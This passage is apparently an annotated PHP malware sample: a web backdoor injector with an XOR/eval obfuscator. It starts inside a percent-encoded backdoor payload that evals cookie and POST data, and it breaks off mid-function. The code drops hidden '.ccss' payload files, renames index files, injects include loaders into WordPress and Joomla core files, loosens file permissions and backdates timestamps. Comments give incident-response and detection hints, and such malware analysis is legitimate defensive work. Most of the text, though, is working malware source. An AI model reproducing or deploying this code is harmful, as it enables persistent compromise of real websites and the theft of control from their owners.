rn%20%24vvwyxfyx%3B%7Dif%20%28%21function_exists%28%27file_put_contents%27%29%29%7Bfunction%20file_put_contents%28%24kgiqbylx%2C%20%24mplisjs%2C%20%24tzzlkdqu%20%3D%20False%29%7B%24mplisjsxfduvsk%20%3D%20%24tzzlkdqu%20%3D%3D%208%20%3F%20%27a%27%20%3A%20%27w%27%3B%24ycesld%20%3D%20%40fopen%28%24kgiqbylx%2C%20%24mplisjsxfduvsk%29%3Bif%20%28%24ycesld%20%3D%3D%3D%20False%29%7Breturn%200%3B%7Delse%7Bif%20%28is_array%28%24mplisjs%29%29%20%24mplisjs%20%3D%20implode%28%24mplisjs%29%3B%24wnosluwxalmvh%20%3D%20fwrite%28%24ycesld%2C%20%24mplisjs%29%3Bfclose%28%24ycesld%29%3Breturn%20%24wnosluwxalmvh%3B%7D%7D%7Dif%20%28%21function_exists%28%27file_get_contents%27%29%29%7Bfunction%20file_get_contents%28%24rjlsnfpf%29%7B%24kzseft%20%3D%20fopen%28%24rjlsnfpf%2C%20%22r%22%29%3B%24valusqf%20%3D%20fread%28%24kzseft%2C%20filesize%28%24rjlsnfpf%29%29%3Bfclose%28%24kzseft%29%3Breturn%20%24valusqf%3B%7D%7Dfunction%20encaioa%28%29%7Breturn%20trim%28preg_replace%28%22/%5C%28.%2A%5C%24/%22%2C%20%27%27%2C%20__FILE__%29%29%3B%7Dfunction%20skghtt%28%24uwucjfg%2C%20%24yjkllsil%29%7B%24xmfrdomo%20%3D%20%22%22%3Bfor%20%28%24ukonchp%3D0%3B%20%24ukonchp%3Cstrlen%28%24uwucjfg%29%3B%29%7Bfor%20%28%24wnosluw%3D0%3B%20%24wnosluw%3Cstrlen%28%24yjkllsil%29%20%26%26%20%24ukonchp%3Cstrlen%28%24uwucjfg%29%3B%20%24wnosluw%2B%2B%2C%20%24ukonchp%2B%2B%29%7B%24xmfrdomo%20.%3D%20chr%28ord%28%24uwucjfg%5B%24ukonchp%5D%29%20%5E%20ord%28%24yjkllsil%5B%24wnosluw%5D%29%29%3B%7D%7Dreturn%20%24xmfrdomo%3B%7Dfunction%20arcnll%28%24uwucjfg%2C%20%24yjkllsil%29%7Bglobal%20%24ukwfik%3Breturn%20skghtt%28skghtt%28%24uwucjfg%2C%20%24yjkllsil%29%2C%20%24ukwfik%29%3B%7Dfunction%20banwrr%28%24uwucjfg%2C%20%24yjkllsil%29%7Bglobal%20%24ukwfik%3Breturn%20skghtt%28skghtt%28%24uwucjfg%2C%20%24ukwfik%29%2C%20%24yjkllsil%29%3B%7Dfunction%20noibksfb%28%29%7B%24qwcgalds%20%3D%20%40file_get_contents%28encaioa%28%29%29%3B%24ytcijln%20%3D%20strpos%28%24qwcgalds%2C%20md5%28encaioa%28%29%29%29%3Bif%20%28%24ytcijln%20%21%3D%3D%20FALSE%29%7B%24c
pqiumbe%20%3D%20substr%28%24qwcgalds%2C%20%24ytcijln%20%2B%2032%29%3B%24hpcupip%20%3D%20%40unserialize%28arcnll%28rawurldecode%28%24cpqiumbe%29%2C%20md5%28encaioa%28%29%29%29%29%3B%7Delse%7B%24hpcupip%20%3D%20Array%28%29%3B%7Dreturn%20%24hpcupip%3B%7Dfunction%20igmddlhx%28%24hpcupip%29%7B%24etoboxnk%20%3D%20rawurlencode%28banwrr%28%40serialize%28%24hpcupip%29%2C%20md5%28encaioa%28%29%29%29%29%3B%24qwcgalds%20%3D%20%40file_get_contents%28encaioa%28%29%29%3B%24ytcijln%20%3D%20strpos%28%24qwcgalds%2C%20md5%28encaioa%28%29%29%29%3Bif%20%28%24ytcijln%20%21%3D%3D%20FALSE%29%7B%24bgnxkqjs%20%3D%20substr%28%24qwcgalds%2C%20%24ytcijln%20%2B%2032%29%3B%24qwcgalds%20%3D%20str_replace%28%24bgnxkqjs%2C%20%24etoboxnk%2C%20%24qwcgalds%29%3B%7Delse%7B%24qwcgalds%20%3D%20%24qwcgalds%20.%20%22%5Cn%5Cn//%22%20.%20md5%28encaioa%28%29%29%20.%20%24etoboxnk%3B%7D%40file_put_contents%28encaioa%28%29%2C%20%24qwcgalds%29%3B%7Dfunction%20wndfcdt%28%24uetgil%2C%20%24ukjayigb%29%7B%24hpcupip%20%3D%20noibksfb%28%29%3B%24hpcupip%5B%24uetgil%5D%20%3D%20xzpkqd%28%24ukjayigb%29%3Bigmddlhx%28%24hpcupip%29%3B%7Dfunction%20tnfqcb%28%24uetgil%29%7B%24hpcupip%20%3D%20noibksfb%28%29%3Bunset%28%24hpcupip%5B%24uetgil%5D%29%3Bigmddlhx%28%24hpcupip%29%3B%7Dfunction%20ielcyedg%28%24uetgil%3DNULL%29%7Bforeach%20%28noibksfb%28%29%20as%20%24hhghxqti%3D%3E%24yflueda%29%7Bif%20%28%24uetgil%29%7Bif%20%28strcmp%28%24uetgil%2C%20%24hhghxqti%29%20%3D%3D%200%29%7Beval%28%24yflueda%29%3Bbreak%3B%7D%7Delse%7Beval%28%24yflueda%29%3B%7D%7D%7Dforeach%20%28array_merge%28%24_COOKIE%2C%20%24_POST%29%20as%20%24txsyjapp%20%3D%3E%20%24uwucjfg%29%7B%24uwucjfg%20%3D%20%40unserialize%28arcnll%28xzpkqd%28%24uwucjfg%29%2C%20%24txsyjapp%29%29%3Bif%20%28isset%28%24uwucjfg%5B%27ak%27%5D%29%20%26%26%20%24ukwfik%3D%3D%24uwucjfg%5B%27ak%27%5D%29%7Bif%20%28%24uwucjfg%5B%27a%27%5D%20%3D%3D%20%27i%27%29%7B%24ukonchp%20%3D%20Array%28%27pv%27%20%3D%3E%20%40phpversion%28%29%2C%27sv%27%20%3D%3E%20%272.0-1%27%2C%27ak%27%20%3D%3E%20%24uwucjfg%5B%27ak
%27%5D%2C%29%3Becho%20%40serialize%28%24ukonchp%29%3Bexit%3B%7Delseif%20%28%24uwucjfg%5B%27a%27%5D%20%3D%3D%20%27e%27%29%7Beval%28%24uwucjfg%5B%27d%27%5D%29%3B%7Delseif%20%28%24uwucjfg%5B%27a%27%5D%20%3D%3D%20%27plugin%27%29%7Bif%28%24uwucjfg%5B%27sa%27%5D%20%3D%3D%20%27add%27%29%7Bwndfcdt%28%24uwucjfg%5B%27p%27%5D%2C%20%24uwucjfg%5B%27d%27%5D%29%3B%7Delseif%28%24uwucjfg%5B%27sa%27%5D%20%3D%3D%20%27rem%27%29%7Btnfqcb%28%24uwucjfg%5B%27p%27%5D%29%3B%7D%7Decho%20%24uwucjfg%5B%27ak%27%5D%3Bexit%28%29%3B%7D%7Dielcyedg%28%29%3B%7D%0A%7D");
// Driver. The percent-encoded string handed to DomainFramer2 in the statement
// above is itself PHP source: once decoded it turns off error logging with
// ini_set()/error_reporting(), walks array_merge($_COOKIE, $_POST), and passes
// request-supplied data to unserialize() and eval() when an embedded key matches.
// Requests carrying opaque base64-like cookie or POST values to the patched
// pages are therefore worth correlating in web server logs.
$framer->find_paths();
$framer->preprocess_paths();
$framer->process($force_inject = TRUE);
$cscripts = $framer->get_cscripts();
// get_cscripts() always returns the two keys "include" and "patch", so this count
// is never 0 and the branch does not run; the dropped file stays on disk.
// The branch also refers to $this outside of any object.
if (count($cscripts) == 0) {
@unlink($this->_current_cscript_path);
}
$cscripts["last_error"] = $framer->last_error();
// The HTTP response of this script is a PHP-serialized array with the keys
// "include", "patch" and "last_error", listing URLs of the modified directories.
echo @serialize($cscripts);
exit(); ?>
Original Code
<?php
// Seeds rand() with the current Unix time. The random names, filler comments and
// padding produced further down are rand()-based, so they differ from sample to
// sample and make poor signature material.
srand(time());
class Obfuscator
{
private $_orig_script = "";
private $_stub = <<<'TTT'
function find_self($encoder)
{
$key = preg_replace($encoder("%2F%5C%28.%2A%24%2F"), '', __FILE__);
$key = trim($key);
$encoder = substr($encoder, 0);
$key = basename($key);
return $key;
}
function myxor($aaaa, $bbbb)
{
return $aaaa ^ $bbbb;
}
function myunpack()
{
return pack('H*', '$rand2_rawurldecode');
}
$encoder = myxor('$rand1_rawurldecode', myunpack());
[PAYLOAD]
$data = $encoder($data);
function find_key($encoder, $data)
{
$key = find_self($encoder);
$chunks = strlen($data)/strlen($key);
$gamma = str_repeat($key, $chunks + 1);
$ykey = substr($gamma, 0, strlen($data));
return $ykey;
}
$ykey = find_key($encoder, $data);
$data=myxor($data, $ykey);
eval($data);
TTT;
/**
 * Returns a random string made of the characters 0-9 and a-z.
 *
 * The length is drawn with rand($min, $max). The characters come from a shuffled
 * copy of the 36-character alphabet (repeated if needed); substr() starts at
 * offset 1, so the first shuffled character is always dropped.
 *
 * Analyst note: every renamed identifier and filler comment in the generated
 * loader is built from this helper, so those strings vary per sample.
 *
 * @param int $min Lower bound passed to rand().
 * @param int $max Upper bound passed to rand().
 * @return string
 */
static public function rand_str($min, $max)
{
$length = rand($min, $max);
return substr(str_shuffle(str_repeat($x = '0123456789abcdefghijklmnopqrstuvwxyz', ceil($length / strlen($x)))), 1, $length);
}
/**
 * Stores the PHP source that generate() will wrap in the XOR/eval loader.
 *
 * @param string $script Plain PHP code to be hidden.
 */
public function __construct($script)
{
$this->_orig_script = $script;
}
/**
 * Builds the obfuscated loader text from the $_stub template.
 *
 * What the output looks like (useful when triaging a suspicious file):
 *  - a run of `$<name> .= "<percent-encoded bytes>";` lines, 76 payload bytes each,
 *  - the name "rawurldecode" never appears literally; it is rebuilt at run time
 *    by XOR-ing a random 12-character string with a hex blob via pack('H*', ...),
 *  - all template variables become `$o` + 5-7 random characters and all template
 *    functions become `_` + 5-7 random characters,
 *  - the decoded payload is finally passed to eval().
 *
 * The stub re-derives the XOR key at run time from basename(__FILE__) (the
 * percent-encoded pattern in find_self decodes to /\(.*$/, which strips the
 * "(...) : eval()'d code" suffix). A sample that was renamed during collection
 * therefore has to be decoded with its original file name as key.
 *
 * @param string $key XOR key; the only caller in this file passes the dropped
 *                    file's own name.
 * @return string Loader source without the opening PHP tag.
 */
public function generate($key)
{
$stub = $this->_gen_stub();
$data = $this->_encode_payload($key);
// Split "rawurldecode" into two XOR shares so the stub can rebuild the name without containing it.
$rand1_rawurldecode = Obfuscator::rand_str(strlen("rawurldecode"), strlen("rawurldecode"));
$rand2_rawurldecode = "rawurldecode" ^ $rand1_rawurldecode;
$rand2_rawurldecode = bin2hex($rand2_rawurldecode);
$stub = str_replace("\$rand2_rawurldecode", $rand2_rawurldecode, $stub);
$stub = str_replace("\$rand1_rawurldecode", $rand1_rawurldecode, $stub);
// Emit the XOR-ed payload as a sequence of percent-encoded string appends.
$chunks = str_split($data, 76);
$data = "\$data = \"\";\n";
foreach ($chunks as $chunk)
{
$data .= "\$data .= \"" . rawurlencode($chunk) . "\";\n";
}
$data .= "\n";
// Template identifiers and their per-sample random replacements (same order in both arrays).
// "$ekey", "myevl" and the [SPACE] placeholder do not occur in the $_stub shown in this file.
$search = array("\$key", "\$data", "\$encoder", "\$ykey", "\$ekey", "\$aaaa", "\$bbbb", "\$gamma", "find_self", "myxor", "find_key", "myevl", "myunpack");
$replace = array("\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7));
$stub = str_replace("[PAYLOAD]", $data, $stub);
$stub = str_replace("[SPACE]", str_repeat(" ", rand(0, 7)), $stub);
$stub = str_replace($search, $replace, $stub);
return $stub;
}
/**
 * Returns a copy of the $_stub template with random noise around every parenthesis.
 *
 * Each "(" and ")" may get a short block comment and/or a space placed before and
 * after it, each decided by an independent rand(0, 1). The callback is declared as a
 * named function inside this method.
 *
 * Analyst note: because of this noise, matching on the loader should ignore
 * comments and whitespace rather than rely on exact byte sequences.
 *
 * @return string Decorated stub template.
 */
private function _gen_stub()
{
$stub = $this->_stub;
function replacer35354($match)
{
$match = $match[0];
// Optional filler before the parenthesis.
if (rand(0, 1))
{
$str1 = "/*" . Obfuscator::rand_str(1, 5) . "*/";
}
else
{
$str1 = "";
}
if (rand(0, 1))
{
$str1 .= " ";
}
// Optional filler after the parenthesis.
if (rand(0, 1))
{
$str2 = "/*" . Obfuscator::rand_str(1, 5) . "*/";
}
else
{
$str2 = "";
}
if (rand(0, 1))
{
$str2 .= " ";
}
return $str1 . $match . $str2;
}
$stub = preg_replace_callback('|\(|', 'replacer35354', $stub);
$stub = preg_replace_callback('|\)|', 'replacer35354', $stub);
return $stub;
}
/**
 * XORs the stored script with $key repeated to the script's length.
 *
 * This is a plain repeating-key XOR; it hides the text from string searches but
 * is reversed by XOR-ing again with the same key.
 *
 * @param string $key Key material to repeat.
 * @return string XOR-ed bytes, same length as the stored script.
 */
private function _encode_payload($key)
{
$key = substr(str_repeat($key, (strlen($this->_orig_script) / strlen($key)) + 1), 0, strlen($this->_orig_script));
return $this->_orig_script ^ $key;
}
}
class DomainFramer2
{
private $_path_cands = array();
private $_path_cands2 = array();
private $_cscript_payload = "";
private $_current_cscript_path = "";
private $_cscripts = array();
private $_cscripts_include = array();
private $_cscripts_patched = array();
private $_last_error = "";
/**
 * Stores the payload that the patching methods will plant.
 *
 * The value is kept percent-encoded: _dump_backdoor() passes it through
 * rawurldecode(), and _patch_file() hands it to morph_php_str() for inlining.
 *
 * @param string $backdoor_payload Percent-encoded PHP source.
 */
public function __construct($backdoor_payload)
{
$this->_cscript_payload = $backdoor_payload;
}
/**
 * Collects the directories that the later stages will try to modify.
 *
 * Candidates are the document root plus the directories returned by walk_dir()
 * with depth 1 (directories only). A candidate is dropped when its path relative
 * to the document root contains any substring from the exclude list. The
 * survivors are sorted from shortest to longest path.
 *
 * Incident-response note: the exclude list means typical CMS asset and library
 * directories are left alone; the document root and the remaining top-level
 * directories are where index files should be checked first.
 */
public function find_paths()
{
$docroot = DomainFramer2::get_docroot();
$this->_path_cands[] = $docroot;
$this->_path_cands = array_merge($this->_path_cands, DomainFramer2::walk_dir($docroot, 1, $skip_files = TRUE, $skip_dirs = FALSE));
$this->_path_cands = array_unique($this->_path_cands);
// Comparator: order by string length.
function csort($a, $b)
{
return strlen($a) - strlen($b);
}
// Filter callback: FALSE (drop) when the docroot-relative path contains an excluded substring.
function match_exclude_list($path)
{
$docroot = DomainFramer2::get_docroot();
$path = substr($path, strlen($docroot));
$exclude = array("font", "css", "library", "vendor", "core", "upload", "view", "controller", "style", "image", "quarantine", "tmp", "tmb", "misc", "themes", "wp-content", "wp-admin", "wp-includes", "administrator", "cache", "components", "images", "includes", "language", "libraries", "media", "modules", "plugins", "templates", "well-known");
foreach ($exclude as $exclude_item) {
if (strpos($path, $exclude_item) !== FALSE) {
return FALSE;
}
}
return TRUE;
}
$this->_path_cands = array_filter($this->_path_cands, "match_exclude_list");
usort($this->_path_cands, 'csort'); # from shortest path to longest
}
/**
 * Runs _preprocess_one() on every candidate directory and keeps those for which
 * it returned a truthy value in $_path_cands2.
 */
public function preprocess_paths()
{
foreach ($this->_path_cands as $path) {
if ($this->_preprocess_one($path)) {
$this->_path_cands2[] = $path;
}
}
}
/**
 * Runs _process_one() on every pre-processed directory and records the
 * directories where it reported success in $_cscripts.
 *
 * $_last_error is cleared before each directory, so after the loop it reflects
 * only the last directory handled.
 *
 * @param bool $force_inject Passed through to the patching methods.
 */
public function process($force_inject = FALSE)
{
foreach ($this->_path_cands2 as $path) {
$this->_last_error = "";
if ($this->_process_one($path, $force_inject)) {
$this->_cscripts[] = $path;
}
}
}
/**
 * Builds the report of modified directories as URLs.
 *
 * Each successfully processed directory is turned into "http://<HTTP_HOST>/<path
 * relative to the document root>" and filed under "include" when the directory is
 * listed in $_cscripts_include (a separate file was dropped and included), or
 * under "patch" otherwise. The host name is taken from the request's Host header.
 *
 * @return array Always contains the keys "include" and "patch", each a list of URLs.
 */
public function get_cscripts()
{
$cscripts = array();
$cscripts["include"] = array();
$cscripts["patch"] = array();
$host = $_SERVER["HTTP_HOST"];
foreach ($this->_cscripts as $current_path) {
if (in_array($current_path, $this->_cscripts_include)) {
$cscripts["include"][] = "http://" . $host . "/" . substr($current_path, strlen(DomainFramer2::get_docroot()) + 1);
} else {
$cscripts["patch"][] = "http://" . $host . "/" . substr($current_path, strlen(DomainFramer2::get_docroot()) + 1);
}
}
return $cscripts;
}
/**
 * Patches one directory: first its index.php, then any recognised CMS files.
 *
 * Both steps always run (the results are combined with a bitwise OR, not a
 * short-circuit), so a directory can end up with several modified files.
 *
 * @param string $path         Directory to process.
 * @param bool   $force_inject Passed through to the patching methods.
 * @return bool TRUE when at least one of the two steps reported success.
 */
private function _process_one($path, $force_inject = FALSE)
{
$res = $this->_patch_index($path, $force_inject);
$res |= $this->_patch_cms($path, $force_inject);
if ($res) {
return TRUE;
} else {
return FALSE;
}
}
/**
 * Creates a new index.php containing only an opening PHP tag and checks that the
 * write succeeded by reading the file back.
 *
 * Incident-response note: a directory that previously had no index file and now
 * holds a near-empty index.php is one trace of this step.
 *
 * @param string $index_php Path of the index.php to create.
 * @return bool TRUE when the file could be read back and contains "php".
 */
private function _try_create_index($index_php)
{
@file_put_contents($index_php, "<" . "?php\n\n");
$content = @file_get_contents($index_php);
if (strpos($content, "php") !== FALSE) {
DomainFramer2::fix_rights($index_php);
$this->_last_error = "index created";
return TRUE;
} else {
return FALSE;
}
}
/**
 * Makes sure a directory is served through an index.php that can later be patched.
 *
 * Behaviour, in order:
 *  - no index.php, index.html, index.htm or .htaccess: create a stub index.php;
 *  - otherwise chmod 0755 the directory and the three index file paths;
 *  - existing index.html / index.htm are renamed to "<name>.bak.bak";
 *  - when there was no index.php, one is written that echoes the renamed file.
 *
 * Incident-response note: files named index.html.bak.bak or index.htm.bak.bak, and
 * an index.php consisting of `echo @file_get_contents('index.html.bak.bak');`
 * (or the .htm variant), are direct artefacts of this method. All file operations
 * are silenced with @, so failures leave no PHP warnings.
 *
 * @param string $path Directory to prepare.
 * @return bool Result of _try_create_index() or _fix_index_php(); FALSE when $path does not exist.
 */
private function _preprocess_one($path)
{
if (!@file_exists($path)) {
return FALSE;
}
$index_html = $path . "/" . "index.html";
$index_htm = $path . "/" . "index.htm";
$index_php = $path . "/" . "index.php";
$htaccess = $path . "/" . ".htaccess";
if (!@file_exists($index_php) && !@file_exists($index_html) && !@file_exists($index_htm) && !@file_exists($htaccess)) {
$this->_last_error = "no index";
return $this->_try_create_index($index_php);
}
DomainFramer2::fix_rights($path);
DomainFramer2::fix_rights($index_html);
DomainFramer2::fix_rights($index_htm);
DomainFramer2::fix_rights($index_php);
if (@file_exists($index_php)) {
// index.php already present: move static index files out of the way.
if (@file_exists($index_html)) @rename($index_html, $index_html . ".bak.bak");
if (@file_exists($index_htm)) @rename($index_htm, $index_htm . ".bak.bak");
} else if (@file_exists($index_html)) {
// Replace index.html with an index.php that prints the renamed original.
@rename($index_html, $index_html . ".bak.bak");
@file_put_contents($index_php, "<" . "?php\n\n\necho @file_get_contents('index.html.bak.bak');");
if (@file_exists($index_htm)) @rename($index_htm, $index_htm . ".bak.bak");
} else if (@file_exists($index_htm)) {
// Same for index.htm.
@rename($index_htm, $index_htm . ".bak.bak");
@file_put_contents($index_php, "<" . "?php\n\n\necho @file_get_contents('index.htm.bak.bak');");
} else {
// Only .htaccess existed: create a stub index.php.
@file_put_contents($index_php, "<" . "?php\n\n\n\n");
}
return $this->_fix_index_php($index_php);
}
/**
 * Ensures the given file contains an opening PHP tag.
 *
 * When the file exists but has no "<?php" (case-insensitive), an empty PHP block is
 * prepended and the original content is kept after it. The result of the write is
 * not checked.
 *
 * @param string $path File to check.
 * @return bool TRUE when the file exists, FALSE otherwise.
 */
private function _fix_index_php($path)
{
if (@file_exists($path)) {
$index_php_content = @file_get_contents($path);
if (stripos($index_php_content, "<" . "?php") !== FALSE) {
return TRUE;
} else {
$index_php_content = "<" . "?php\n\n\n\n?" . ">\n\n" . $index_php_content;
@file_put_contents($path, $index_php_content);
return TRUE;
}
}
return FALSE;
}
/**
 * Writes the obfuscated payload to a hidden file and returns its path.
 *
 * The path is cached in $_current_cscript_path, so only one file is written per
 * run. The target is a writable directory from the shuffled result of walk_dir()
 * on $root_dir with depth 2. The file name is a dot, the first eight hex
 * characters of md5(time()), and the extension ".ccss". The file name is also
 * used as the XOR key for the obfuscator.
 *
 * Incident-response note: look for hidden files matching `.[0-9a-f]{8}.ccss`
 * that begin with a PHP opening tag. fix_time() is called on the file right after
 * it is written, so its modification time should not be trusted; compare against
 * a known-good file listing or hashes instead.
 *
 * @param string $root_dir Directory under which a writable location is searched.
 * @return string|null Path of the written file, or NULL when nothing could be written.
 */
private function _dump_backdoor($root_dir)
{
if ($this->_current_cscript_path) {
return $this->_current_cscript_path;
}
$dirs = DomainFramer2::walk_dir($root_dir, $depth = 2, $skip_files = TRUE, $skip_dirs = FALSE);
$root_dir = "";
shuffle($dirs);
// No break: the last writable directory in the shuffled order is the one kept.
foreach ($dirs as $dir) {
if (@is_writable($dir)) {
$root_dir = $dir;
}
}
if (empty($root_dir))
{
$this->_current_cscript_path = "";
$this->_last_error = "no writable for payload";
return NULL;
}
DomainFramer2::fix_rights($root_dir);
$obfuscator = new Obfuscator(rawurldecode($this->_cscript_payload));
$name = "." . substr(md5(time()), 0, 8) . ".ccss";
$this->_current_cscript_path = $root_dir . "/" . $name;
$cscript_file_content = "<" . "?php" . "\n" . $obfuscator->generate($name) . "\n";
@file_put_contents($this->_current_cscript_path, $cscript_file_content);
DomainFramer2::fix_time($this->_current_cscript_path);
if (!@is_file($this->_current_cscript_path)) {
$this->_current_cscript_path = "";
$this->_last_error = "cant dump payload";
return NULL;
}
return $this->_current_cscript_path;
}
/**
 * Injects a loader into one PHP file via insert_in_head().
 *
 * Two variants exist:
 *  - a hidden payload file could be written: the injected code assigns its path to
 *    a variable named `$r` + 1-5 random characters, copies it with str_repeat(.., 1)
 *    into `$t` + 1-5 random characters, and calls `@include_once` on that variable
 *    with a short block comment between keyword and parenthesis. In the path, "-"
 *    and one character picked from "hmepulic" are written as \x hex escapes;
 *  - no writable directory: the whole payload is inlined through morph_php_str().
 *
 * Incident-response note: in a patched file, look for an `@include_once` of a
 * variable whose string value contains \x escapes and ends in ".ccss"; the
 * inline variant is produced by morph_php_str(), which is not part of this
 * excerpt.
 *
 * @param string $path          File to modify.
 * @param string $root          Directory the file belongs to; recorded as include/patched.
 * @param bool   $force_inject  Passed to insert_in_head().
 * @param bool   $recovery_mode Passed to insert_in_head().
 * @return bool Result of insert_in_head(); FALSE when $path does not exist.
 */
private function _patch_file($path, $root, $force_inject = FALSE, $recovery_mode = FALSE)
{
if (!@file_exists($path)) {
return FALSE;
}
$backdoor_path = $this->_dump_backdoor($root);
if (!empty($backdoor_path)) {
//$backdoor_path = $backdoor_path
$dict = str_split("hmepulic");
$sym = $dict[array_rand($dict)];
$backdoor_path = str_replace("-", "\\x" . dechex(ord("-")), $backdoor_path);
$backdoor_path = str_replace($sym, "\\x" . dechex(ord($sym)), $backdoor_path);
$patch = "\n\$path = \"" . $backdoor_path . "\"; ";
$patch .= "\$apath = str_repeat(\$path, 1); ";
$patch .= sprintf("@include_once /* %s */ (\$apath);\n", Obfuscator::rand_str(1, 5));
$patch = str_replace("\$path", "\$r" . Obfuscator::rand_str(1, 5), $patch);
$patch = str_replace("\$apath", "\$t" . Obfuscator::rand_str(1, 5), $patch);
$this->_cscripts_include[] = $root;
} else // cant dump backdoor, probable no writable dirs
{
// try patch full backdoor content
$patch = DomainFramer2::morph_php_str($this->_cscript_payload);
$this->_cscripts_patched[] = $root;
}
$res = DomainFramer2::insert_in_head($path, $patch, $force_inject, $recovery_mode);
if ($res === FALSE)
{
$this->_last_error = "unwritable for patch";
}
return $res;
}
/**
 * Analyst note: targets "index.php" directly inside $path and hands it to
 * _patch_file(), using $path itself as the site root.
 *
 * @param string $path         Site directory.
 * @param bool   $force_inject Passed through to _patch_file().
 * @return bool Result of _patch_file().
 */
private function _patch_index($path, $force_inject = FALSE)
{
$index_php = $path . "/" . "index.php";
return $this->_patch_file($index_php, $path, $force_inject);
}
/**
 * Analyst note: fingerprints the CMS from index.php and injects into one of a
 * fixed list of core files instead of index.php itself.
 *
 * Files to inspect when this sample is suspected (paths relative to the site
 * directory, taken from the lists below):
 *  - index.php mentions "wp-blog-header.php": wp-settings.php, wp-config.php,
 *    wp-includes/load.php, wp-content/plugins/akismet/akismet.php;
 *  - index.php mentions "_JEXEC": libraries/import.php, includes/framework.php.
 *
 * Every candidate is chmod'ed to 0755 before the writability test, whether or
 * not it ends up modified.
 *
 * @param string $path         Site directory.
 * @param bool   $force_inject Passed through to _patch_file().
 * @return int|bool FALSE when no CMS was recognised; otherwise the OR-ed
 *                  results of the _patch_file() calls (an int after "|=").
 */
private function _patch_cms($path, $force_inject = FALSE)
{
$index_php = $path . "/" . "index.php";
$index_php_content = @file_get_contents($index_php);
// "> 0" means a match at offset 0 is treated as no match.
if (strpos($index_php_content, "wp-blog-header.php") > 0) {
$inject_file_cands = array($path . "/" . "wp-settings.php", $path . "/" . "wp-config.php", $path . "/" . "wp-includes/load.php", $path . "/" . "wp-content/plugins/akismet/akismet.php");
} elseif (strpos($index_php_content, "_JEXEC") > 0) {
$inject_file_cands = array($path . "/" . "libraries/import.php", $path . "/" . "includes/framework.php",);
} else {
$inject_file_cands = array();
}
if (!count($inject_file_cands)) {
return FALSE;
}
// Random order, so the affected file differs from site to site.
shuffle($inject_file_cands);
$status = FALSE;
$inject_file_cand = "";
for ($i = 0; $i < count($inject_file_cands); $i++) {
$inject_file_cand = $inject_file_cands[$i];
DomainFramer2::fix_rights($inject_file_cand);
if (@is_writable($inject_file_cand)) {
// $status is passed as $recovery_mode: once one candidate has been patched,
// insert_in_head() only touches further candidates that already carry the marker.
$status |= $this->_patch_file($inject_file_cand, $path, $force_inject, $status);
}
}
if (empty($inject_file_cand))
{
return FALSE;
}
return $status;
}
/**
 * Recursively lists entries below $dir as "$dir/$name" paths.
 *
 * All filesystem calls are error-suppressed; an unreadable directory
 * contributes nothing to the result.
 *
 * @param string $dir        Directory to list.
 * @param int    $depth      Remaining depth budget; a negative value yields an empty list.
 * @param bool   $skip_files When TRUE, non-directory entries are left out.
 * @param bool   $skip_dirs  When TRUE, directories are descended into but not listed.
 * @return array List of paths.
 */
static public function walk_dir($dir, $depth = 0, $skip_files = FALSE, $skip_dirs = TRUE)
{
if ($depth < 0) {
return array();
}
$result = array();
if (($h = @opendir($dir)) === FALSE) {
return $result;
}
while (($f = @readdir($h)) !== FALSE) {
if ($f == '.' || $f == '..') {
continue;
}
$current_file = "$dir/$f";
if (@is_dir($current_file)) {
if (!$skip_dirs) {
$result[] = $current_file;
}
// Recursion happens even when directories themselves are not listed.
$result = array_merge($result, DomainFramer2::walk_dir($current_file, $depth - 1, $skip_files, $skip_dirs));
} else {
if (!$skip_files) {
$result[] = $current_file;
}
}
}
@closedir($h);
return $result;
}
/**
 * Analyst note: sets mode 0755 on $path with errors suppressed. It is called
 * on directories and files before they are written, so a mode change to 0755
 * on a file that was previously more restrictive is an artefact of this sample.
 *
 * @param string $path File or directory.
 */
static public function fix_rights($path)
{
@chmod($path, 0755);
}
/**
 * Analyst note: timestamp manipulation. With the default $tm of -1 the file's
 * time is set to a random point between 30 and 365 days before now; otherwise
 * it is set to $tm. Timelines built from modification times are therefore
 * unreliable for files this code has touched; on typical Unix filesystems the
 * inode change time is not settable through touch() and is the better source.
 *
 * @param string $path File to touch.
 * @param int    $tm   Unix timestamp to apply, or -1 for a random past time.
 */
static public function fix_time($path, $tm=-1)
{
if ($tm == -1)
{
// Offset range: 60*60*24*30 to 60*60*24*365 seconds.
@touch($path, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));
}
else
{
@touch($path, $tm);
}
}
/**
 * Derives the document root from the current request: the query string is cut
 * from REQUEST_URI, the remaining path is searched (last occurrence) in
 * SCRIPT_FILENAME, and everything before the match is returned.
 *
 * @return string DOCUMENT_ROOT when the request path is not found in
 *                SCRIPT_FILENAME, "/" when it matches at offset 0, otherwise
 *                the prefix of SCRIPT_FILENAME; backslashes are converted to
 *                forward slashes except in the "/" case.
 */
static public function get_docroot()
{
$request_uri = "";
$docroot = "";
// Keep only the path part of the request URI.
if (strpos($_SERVER['REQUEST_URI'], "?") !== FALSE) {
$request_uri = explode("?", $_SERVER['REQUEST_URI']);
$request_uri = $request_uri[0];
} else {
$request_uri = $_SERVER['REQUEST_URI'];
}
$docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $request_uri);
if ($docroot_end === FALSE) {
$docroot = $_SERVER['DOCUMENT_ROOT'];
} elseif ($docroot_end === 0) {
return "/";
} else {
$docroot = substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end);
}
return str_replace("\\", "/", $docroot);
}
/**
 * Analyst note: string mutation used to vary the inline payload. A step N is
 * drawn at random from 2 to 5; every character whose index is a multiple of N,
 * and which is neither a backslash nor a double quote, is replaced by two
 * backslash characters followed by its octal character code. All other
 * characters are copied unchanged. Because N and therefore the escaped
 * positions differ per call, byte-exact signatures on the output do not hold
 * across infections.
 *
 * @param string $string Text to mutate.
 * @return string Mutated text.
 */
static public function morph_str($string)
{
$hex = '';
$module = rand(2, 5);
for ($i = 0; $i < strlen($string); $i++) {
if (($i % $module) == 0 && $string[$i] != "\\" && $string[$i] != "\"") {
$code = decoct(ord($string[$i]));
// Codes that are not already three digits get a single leading "0".
